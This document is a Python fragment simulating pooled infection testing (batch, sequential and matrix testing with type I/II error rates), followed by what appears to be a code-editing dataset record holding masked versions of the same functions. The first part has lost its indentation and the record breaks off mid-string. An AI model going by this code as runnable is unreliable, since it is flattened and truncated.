for temp_batch in np.array_split(matrix_test_array, matrix_test_num):
temp_batch = temp_batch.reshape(side_length, side_length, 2)
temp_row = []
temp_col = []
random_num_row = np.random.uniform(0, 1, sq_repeat)
random_num_col = np.random.uniform(0, 1, sq_repeat)
for i in range(side_length):
if 1 in (temp_batch[i,:,1]):
if max(random_num_row) > typeII_error:
temp_row.append(temp_batch[i,:,0])
else:
if min(random_num_row) < typeI_error:
temp_row.append(temp_batch[i, :, 0])
if 1 in (temp_batch[:,i,1]):
if max(random_num_col) > typeII_error:
temp_col.append(temp_batch[:,i,0])
else:
if min(random_num_col) < typeI_error:
temp_col.append(temp_batch[:, i, 0])
ind_idx.append(np.intersect1d(temp_row, temp_col))
ind_idx = np.concatenate(ind_idx)
ind_idx = ind_idx.astype('int')
if len(ind_idx) == 0:
neg_array = matrix_test_array
else:
mask = np.zeros(subject_array.shape[0], dtype = bool)
mask[ind_idx] = True
mask[matrix_test_num*side_length**2:] = True
ind_test_array = subject_array[mask,:]
neg_array = subject_array[~mask, :]
neg_array[:, 1] = 0
ind_test, ind_con = conventional_test(ind_test_array,
typeII_error, typeI_error, repeat = ind_repeat, seq = seq)
batch_test_num = matrix_test_num * 2 * side_length * sq_repeat
result = np.concatenate((neg_array, ind_test))
result = result[result[:, 0].argsort()]
return (result, batch_test_num + ind_con, ind_con)
def parallel_batch_testing(subject_array, batch_size, typeII_error, typeI_error, parallel_num, ind_repeat, seq):
"""
This function provides the parallel batch testing results for a given subject array.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
parallel_num (int): the number of parallel testing for the batch testing
ind_repeat (int): the number of potential individual testing for the positive batches
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
neg_batch = []
pos_batch = []
batch_consum = np.ceil(len(subject_array)/batch_size)* parallel_num
for temp_batch in np.array_split(subject_array, np.ceil(len(subject_array)/batch_size)):
random_table = np.random.uniform(0, 1, (1, parallel_num))
if 1 in (temp_batch[:, 1]):
if random_table.max() > typeII_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
else:
if random_table.min() < typeI_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([])
pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([])
neg_batch[:, 1] = 0
individual_test, individual_con = conventional_test(pos_batch, typeII_error, typeI_error,
repeat = ind_repeat, seq = seq)
result = np.concatenate((individual_test, neg_batch))
result = result[result[:,0].argsort()]
result = result.astype('int64')
return (result, batch_consum+individual_con, individual_con)
def fixed_batch_seq_test(subject_array,stop_rule, p, batch_size, typeII_error, typeI_error, repeat, prob_threshold = 0.3, seq = True):
"""
This function provides the parallel batch testing results for a given subject array.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
stop_rule (int): the number of positive batches to enter the individual testing phase
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of potential individual testing for the positive crossings
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
consum = 0
temp = {'data': subject_array,
'NB_Num': 0,
'PB_Num': 0,
'p': p,
'batch_size': batch_size}
temp_list.append(temp)
new_list = []
neg_array = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'], i['p'], i['batch_size'],
typeII_error, typeI_error)
temp0 = {'data': np.random.permutation(temp0),
'NB_Num': i['NB_Num'] + 1,
'PB_Num': i['PB_Num'],
'p': p0,
'batch_size': batch_size}
temp1 = {'data': np.random.permutation(temp1),
'NB_Num': i['NB_Num'],
'PB_Num': i['PB_Num'] + 1,
'p': p1,
'batch_size': batch_size}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data'])>0:
if temp1['PB_Num'] >= stop_rule or temp1['p']>=prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
pos_array = np.concatenate(pos_array)
neg_array[:,1] = 0
individual_test, individual_con = conventional_test(pos_array, typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
result = result[result[:,0].argsort()]
result = result.astype('int64')
return (result, consum, individual_con)
def name_fun(n):
"""
input: stopping rule
output: finish nodes
"""
output = []
temp = ['']
for i in range(2*n-1):
temp_cur = []
for j in temp:
candidate_pos = j + '+'
candidate_neg = j + '-'
if str.count(candidate_pos, '+') >= n:
output.append(candidate_pos)
else:
temp_cur.append(candidate_pos)
if str.count(candidate_neg, '-') >= n:
output.append(candidate_neg)
else:
temp_cur.append(candidate_neg)
temp = temp_cur
neg_symbol = [x for x in output if str.count(x, '-') == n]
pos_symbol = [x for x in output if str.count(x, '+') == n]
return output, neg_symbol, pos_symbol
def seq_test_with_node(subject_array,stop_rule,p, batch_size, typeII_error, typeI_error, repeat = 1,
prob_threshold = 1, seq = True, batch_limit = 32):
"""
A function gives the test results to a subject array and the total number of
test-kit consumption and the individual testing number given the subject array,
the stop rule, the batch size, the probability of type II error, the probability of
Type I error, and the number of repeatition, the probability threshold, and
setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
stop_rule (int): the number of postive batches to enter individual testing
p (float): infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
batch_limit (int):
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
batch_num_list = []
consum = 0
temp = {'data': subject_array,
'NB_Num': 0,
'PB_Num': 0,
'p': p,
'batch_size': batch_size,
'node': ''}
temp_list.append(temp)
new_list = []
neg_array = []
neg_node = []
pos_node = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'], i['p'], i['batch_size'],
typeII_error, typeI_error,
batch_limit = batch_limit)
temp0 = {'data': temp0,
'NB_Num': i['NB_Num'] + 1,
'PB_Num': i['PB_Num'],
'p': p0,
'batch_size': n0,
'node': i['node'] + '-'}
temp1 = {'data': temp1,
'NB_Num': i['NB_Num'],
'PB_Num': i['PB_Num'] + 1,
'p': p1,
'batch_size': n1,
'node': i['node'] + '+'}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data'])>0:
if temp1['PB_Num'] >= stop_rule or temp1['p']>=prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
batch_num_list.append(consum)
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
temp = [[x, j['node']] for x in j['data'][:,0]]
neg_node.append(temp)
neg_array = np.concatenate(neg_array)
#print(neg_array)
#print(neg_node)
#neg_node = np.concatenate(neg_node)
for k in pos_list:
pos_array.append(k['data'])
#pos_node.append(k['node'])
#pos_node.append(np.column_stack((k['data'][:,0],np.repeat(k['node'], len(k['data'])))))
temp = [[x, k['node']] for x in k['data'][:,0]]
pos_node.append(temp)
pos_array = np.concatenate(pos_array)
#pos_node = np.concatenate(pos_node)
neg_array[:,1] = 0
individual_test, individual_con = conventional_test(pos_array, typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
#node = np.concatenate((pos_node, neg_node))
pos_node.extend(neg_node)
node = pos_node
node = sum(node, [])
node.sort()
node = [x[1] for x in node]
#node = node[node[:,0].argsort()]
result = result[result[:,0].argsort()]
result = result.astype('int64')
return (result, consum, individual_con, node, batch_num_list)
|
flexible
|
{
"blob_id": "e564e0d05c3c0e60f356422722803df510d9dd0b",
"index": 281,
"step-1": "<mask token>\n\n\n@njit(parallel=True)\ndef parallel_test(subject_array, typeII_error, typeI_error, num):\n test_result = np.zeros(subject_array.shape, dtype=int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], num))\n for i in range(len(subject_array)):\n subject = subject_array[i, 1]\n if subject == 1:\n temp = 1 if max(random_table[i, :]) > typeII_error else 0\n elif subject == 0:\n temp = 1 if min(random_table[i, :]) < typeI_error else 0\n test_result[i, 0] = subject_array[i, 0]\n test_result[i, 1] = temp\n return test_result, len(subject_array) * num, len(subject_array) * num\n\n\ndef infection_rate_on_negative_batch(p, batch_size, typeII_error, typeI_error):\n \"\"\"\n \n Given infection rate, batch size, prob of type II error and prob of type I error, this\n function gives the infection rate on the negative batch.\n \n Input:\n p (float): the infection rate\n batch_size (int): the batch size\n typeII_error (float): the prob of type II error\n typeI_error (float): the prob of type I error\n\n Output:\n (float): the infection rate on the negative batch\n\n\n\n \"\"\"\n q = 1 - p\n r = typeII_error * (1 - q ** batch_size) / ((1 - typeI_error) * q **\n batch_size + typeII_error * (1 - q ** batch_size))\n return p * r / (1 - q ** batch_size)\n\n\ndef infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error):\n \"\"\"\n Given infection rate, batch size, prob of type II error and prob of type I error, this\n function gives the infection rate on the positive batch.\n \n Input:\n p (float): the infection rate\n batch_size (int): the batch size\n typeII_error (float): the prob of type II error\n typeI_error (float): the prob of type I error\n\n Output:\n (float): the infection rate on the positive batch\n \"\"\"\n q = 1 - p\n r = (1 - typeII_error) * (1 - q ** batch_size) / (typeI_error * q **\n batch_size + (1 - typeII_error) * (1 - q ** batch_size))\n return p * r / (1 - q ** batch_size)\n\n\ndef one_batch_test_solver(prevalence_rate, typeII_error, typeI_error,\n n_initial_guess=2):\n \"\"\"\n A function gives (float) the best batch size for one batch test given the infection rate\n \n Inputs:\n prevalence_rate(float): infection rate\n typeII_error(float): the prob of type II error\n typeI_error(float): the prob of type I error\n n_initial_guess(float): the initial guess \n\n Output:\n (float): the optimal batch size\n\n \"\"\"\n q = 1 - prevalence_rate\n func = lambda n: n * q ** (n / 2) - (-(1 - typeII_error - typeI_error) *\n np.log(q)) ** (-1 / 2)\n n_solution = fsolve(func, n_initial_guess)\n return float(n_solution)\n\n\n<mask token>\n\n\ndef helpfunction(subject_array, p, batch_size, typeII_error, typeI_error,\n batch_limit):\n \"\"\"\n The helpfunction is a handy function to give the list of subjects on the\n negative batch(es), the list of subjects on the postive batch(es), the \n test-kit consumption, the infection rate on the negative batches, the \n infection rate on the positive batches, the optimal batch size for\n negative batches and the optimal batch size for positive batches.\n\n Input: \n subject_array (Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n p (float): Infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n batch_limit (int): batch size upper limit\n\n Output:\n temp0 (Numpy Array): an array of subjects on the negative batch(es)\n temp1 (Numpy Array): an array of subjects on the postive batch(es)\n temp_con (int): the number of test-kit consumptions\n p0 (float): the infection rate on the negative batches\n p1 (float): the infection rate on the positive batches\n n0 (float): the optimal batch size for the negative batches\n n1 (float): the optimal batch size for the positive batches\n \"\"\"\n batch_size = min(batch_size, batch_limit)\n p0 = infection_rate_on_negative_batch(p, batch_size, typeII_error,\n typeI_error)\n p1 = infection_rate_on_positive_batch(p, batch_size, typeII_error,\n typeI_error)\n n0 = one_batch_test_int_solver(p0, typeII_error, typeI_error, batch_limit)\n n1 = one_batch_test_int_solver(p1, typeII_error, typeI_error, batch_limit)\n if subject_array == np.array([]):\n return np.array([]), np.array([]), p0, p1, n0, n1\n temp0, temp1, temp_con = neg_pos_batch_split(subject_array, batch_size,\n typeII_error, typeI_error)\n return temp0, temp1, temp_con, p0, p1, n0, n1\n\n\ndef seq_test(subject_array, stop_rule, p, batch_size, typeII_error,\n typeI_error, repeat=1, prob_threshold=1, seq=True, batch_limit=32):\n \"\"\"\n A function gives the test results to a subject array and the total number of \n test-kit consumption and the individual testing number given the subject array,\n the stop rule, the batch size, the probability of type II error, the probability of \n Type I error, and the number of repeatition, the probability threshold, and \n setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of postive batches to enter individual testing\n p (float): infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n batch_limit (int):\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error,\n batch_limit=batch_limit)\n temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[\n 'PB_Num'], 'p': p0, 'batch_size': n0}\n temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[\n 'PB_Num'] + 1, 'p': p1, 'batch_size': n1}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con\n\n\n<mask token>\n\n\n@jit(parallel=True)\ndef data_gen(size, p):\n \"\"\"\n data_gen provides a faster way to generate a random population with\n infection rate p.\n Input:\n size (int): the size of population\n p (float): the infection rate\n Output:\n test_array (array): the first column is for id and the second column\n is the condition, where 1 stands for infection and 0 stands for uninfection\n\n \"\"\"\n random_table = np.random.binomial(size=size, p=p, n=1)\n test_array = np.zeros((size, 2), dtype=int)\n for i in range(size):\n test_array[i, 0] = i\n test_array[i, 1] = random_table[i]\n return test_array\n\n\n<mask token>\n\n\ndef fixed_batch_seq_test(subject_array, stop_rule, p, batch_size,\n typeII_error, typeI_error, repeat, prob_threshold=0.3, seq=True):\n \"\"\"\n This function provides the parallel batch testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of positive batches to enter the individual testing phase\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of potential individual testing for the positive crossings\n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error)\n temp0 = {'data': np.random.permutation(temp0), 'NB_Num': i[\n 'NB_Num'] + 1, 'PB_Num': i['PB_Num'], 'p': p0, 'batch_size':\n batch_size}\n temp1 = {'data': np.random.permutation(temp1), 'NB_Num': i[\n 'NB_Num'], 'PB_Num': i['PB_Num'] + 1, 'p': p1, 'batch_size':\n batch_size}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con\n\n\ndef name_fun(n):\n \"\"\"\n input: stopping rule\n output: finish nodes\n \"\"\"\n output = []\n temp = ['']\n for i in range(2 * n - 1):\n temp_cur = []\n for j in temp:\n candidate_pos = j + '+'\n candidate_neg = j + '-'\n if str.count(candidate_pos, '+') >= n:\n output.append(candidate_pos)\n else:\n temp_cur.append(candidate_pos)\n if str.count(candidate_neg, '-') >= n:\n output.append(candidate_neg)\n else:\n temp_cur.append(candidate_neg)\n temp = temp_cur\n neg_symbol = [x for x in output if str.count(x, '-') == n]\n pos_symbol = [x for x in output if str.count(x, '+') == n]\n return output, neg_symbol, pos_symbol\n\n\ndef seq_test_with_node(subject_array, stop_rule, p, batch_size,\n typeII_error, typeI_error, repeat=1, prob_threshold=1, seq=True,\n batch_limit=32):\n \"\"\"\n A function gives the test results to a subject array and the total number of \n test-kit consumption and the individual testing number given the subject array,\n the stop rule, the batch size, the probability of type II error, the probability of \n Type I error, and the number of repeatition, the probability threshold, and \n setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of postive batches to enter individual testing\n p (float): infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n batch_limit (int):\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n batch_num_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size, 'node': ''}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n neg_node = []\n pos_node = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error,\n batch_limit=batch_limit)\n temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[\n 'PB_Num'], 'p': p0, 'batch_size': n0, 'node': i['node'] + '-'}\n temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[\n 'PB_Num'] + 1, 'p': p1, 'batch_size': n1, 'node': i['node'] +\n '+'}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n batch_num_list.append(consum)\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n temp = [[x, j['node']] for x in j['data'][:, 0]]\n neg_node.append(temp)\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n temp = [[x, k['node']] for x in k['data'][:, 0]]\n pos_node.append(temp)\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n pos_node.extend(neg_node)\n node = pos_node\n node = sum(node, [])\n node.sort()\n node = [x[1] for x in node]\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con, node, batch_num_list\n",
"step-2": "<mask token>\n\n\n@jit(parallel=True)\ndef conventional_test(subject_array, typeII_error, typeI_error, repeat=1,\n seq=True):\n \"\"\"\n A function gives the test results to a subject array given the probability of\n type II error, the probability of Type I error, and the number of repeatition,\n and setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n test_result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n \"\"\"\n if seq == True:\n consum = 0\n test_result = np.zeros(subject_array.shape, dtype=int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)\n )\n for i in range(len(subject_array)):\n temp = 0\n j = 0\n subject = subject_array[i, 1]\n while j < repeat and temp == 0:\n random_num = random_table[i, j]\n consum += 1\n if subject == 1:\n temp = 1 if random_num > typeII_error else 0\n else:\n temp = 1 if random_num < typeI_error else 0\n j += 1\n test_result[i, 0] = subject_array[i, 0]\n test_result[i, 1] = temp\n return test_result, consum\n else:\n test_result = np.zeros(subject_array.shape, dtype=int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)\n )\n for i in range(len(subject_array)):\n temp = 0\n for j in range(repeat):\n temp_random = random_table[i, j]\n if subject_array[i, 1] == 1:\n temp_1 = 1 if temp_random > typeII_error else 0\n elif subject_array[i, 1] == 0:\n temp_1 = 1 if temp_random < typeI_error else 0\n temp += temp_1\n temp = 1 if temp >= repeat / 2 else 0\n test_result[i, 0] = subject_array[i, 0]\n test_result[i, 1] = temp\n return test_result, len(subject_array) * repeat\n\n\n@njit(parallel=True)\ndef parallel_test(subject_array, typeII_error, typeI_error, num):\n test_result = np.zeros(subject_array.shape, dtype=int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], num))\n for i in range(len(subject_array)):\n subject = subject_array[i, 1]\n if subject == 1:\n temp = 1 if max(random_table[i, :]) > typeII_error else 0\n elif subject == 0:\n temp = 1 if min(random_table[i, :]) < typeI_error else 0\n test_result[i, 0] = subject_array[i, 0]\n test_result[i, 1] = temp\n return test_result, len(subject_array) * num, len(subject_array) * num\n\n\ndef infection_rate_on_negative_batch(p, batch_size, typeII_error, typeI_error):\n \"\"\"\n \n Given infection rate, batch size, prob of type II error and prob of type I error, this\n function gives the infection rate on the negative batch.\n \n Input:\n p (float): the infection rate\n batch_size (int): the batch size\n typeII_error (float): the prob of type II error\n typeI_error (float): the prob of type I error\n\n Output:\n (float): the infection rate on the negative batch\n\n\n\n \"\"\"\n q = 1 - p\n r = typeII_error * (1 - q ** batch_size) / ((1 - typeI_error) * q **\n batch_size + typeII_error * (1 - q ** batch_size))\n return p * r / (1 - q ** batch_size)\n\n\ndef infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error):\n \"\"\"\n Given infection rate, batch size, prob of type II error and prob of type I error, this\n function gives the infection rate on the positive batch.\n \n Input:\n p (float): the infection rate\n batch_size (int): the batch size\n typeII_error (float): the prob of type II error\n typeI_error (float): the prob of type I error\n\n Output:\n (float): the infection rate on the positive batch\n \"\"\"\n q = 1 - p\n r = (1 - typeII_error) * (1 - q ** batch_size) / (typeI_error * q **\n batch_size + (1 - typeII_error) * (1 - q ** batch_size))\n return p * r / (1 - q ** batch_size)\n\n\ndef one_batch_test_solver(prevalence_rate, typeII_error, typeI_error,\n n_initial_guess=2):\n \"\"\"\n A function gives (float) the best batch size for one batch test given the infection rate\n \n Inputs:\n prevalence_rate(float): infection rate\n typeII_error(float): the prob of type II error\n typeI_error(float): the prob of type I error\n n_initial_guess(float): the initial guess \n\n Output:\n (float): the optimal batch size\n\n \"\"\"\n q = 1 - prevalence_rate\n func = lambda n: n * q ** (n / 2) - (-(1 - typeII_error - typeI_error) *\n np.log(q)) ** (-1 / 2)\n n_solution = fsolve(func, n_initial_guess)\n return float(n_solution)\n\n\n<mask token>\n\n\ndef neg_pos_batch_split(subject_array, batch_size, typeII_error, typeI_error):\n \"\"\"\n A function gives a list of sujects on the negative batch(es),\n a list of subjects on the postive batch(es) and the test-kit \n consumption given the probability of type II error, the \n probability of Type I error.\n \n Input:\n subject_array (Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n \n\n Output:\n neg_batch (Numpy Array): an array of subjects on the negative batch(es)\n pos_batch (Numpy Array): an array of subjects on the postive batch(es)\n test_consum (int): the number of test-kit consumptions\n \n \"\"\"\n neg_batch = []\n pos_batch = []\n test_consum = np.ceil(len(subject_array) / batch_size)\n random_table = np.random.uniform(0, 1, int(test_consum))\n i = 0\n for temp_batch in np.array_split(subject_array, test_consum):\n if 1 in temp_batch[:, 1]:\n if random_table[i] > typeII_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n elif random_table[i] > typeI_error:\n neg_batch.append(temp_batch)\n else:\n pos_batch.append(temp_batch)\n i += 1\n neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([\n ])\n pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([\n ])\n return neg_batch, pos_batch, test_consum\n\n\ndef helpfunction(subject_array, p, batch_size, typeII_error, typeI_error,\n batch_limit):\n \"\"\"\n The helpfunction is a handy function to give the list of subjects on the\n negative batch(es), the list of subjects on the postive batch(es), the \n test-kit consumption, the infection rate on the negative batches, the \n infection rate on the positive batches, the optimal batch size for\n negative batches and the optimal batch size for positive batches.\n\n Input: \n subject_array (Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n p (float): Infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n batch_limit (int): batch size upper limit\n\n Output:\n temp0 (Numpy Array): an array of subjects on the negative batch(es)\n temp1 (Numpy Array): an array of subjects on the postive batch(es)\n temp_con (int): the number of test-kit consumptions\n p0 (float): the infection rate on the negative batches\n p1 (float): the infection rate on the positive batches\n n0 (float): the optimal batch size for the negative batches\n n1 (float): the optimal batch size for the positive batches\n \"\"\"\n batch_size = min(batch_size, batch_limit)\n p0 = infection_rate_on_negative_batch(p, batch_size, typeII_error,\n typeI_error)\n p1 = infection_rate_on_positive_batch(p, batch_size, typeII_error,\n typeI_error)\n n0 = one_batch_test_int_solver(p0, typeII_error, typeI_error, batch_limit)\n n1 = one_batch_test_int_solver(p1, typeII_error, typeI_error, batch_limit)\n if subject_array == np.array([]):\n return np.array([]), np.array([]), p0, p1, n0, n1\n temp0, temp1, temp_con = neg_pos_batch_split(subject_array, batch_size,\n typeII_error, typeI_error)\n return temp0, temp1, temp_con, p0, p1, n0, n1\n\n\ndef seq_test(subject_array, stop_rule, p, batch_size, typeII_error,\n typeI_error, repeat=1, prob_threshold=1, seq=True, batch_limit=32):\n \"\"\"\n A function gives the test results to a subject array and the total number of \n test-kit consumption and the individual testing number given the subject array,\n the stop rule, the batch size, the probability of type II error, the probability of \n Type I error, and the number of repeatition, the probability threshold, and \n setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of postive batches to enter individual testing\n p (float): infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n batch_limit (int):\n\n Output:\n result (Numpy Array): an array contains subjects' id and test 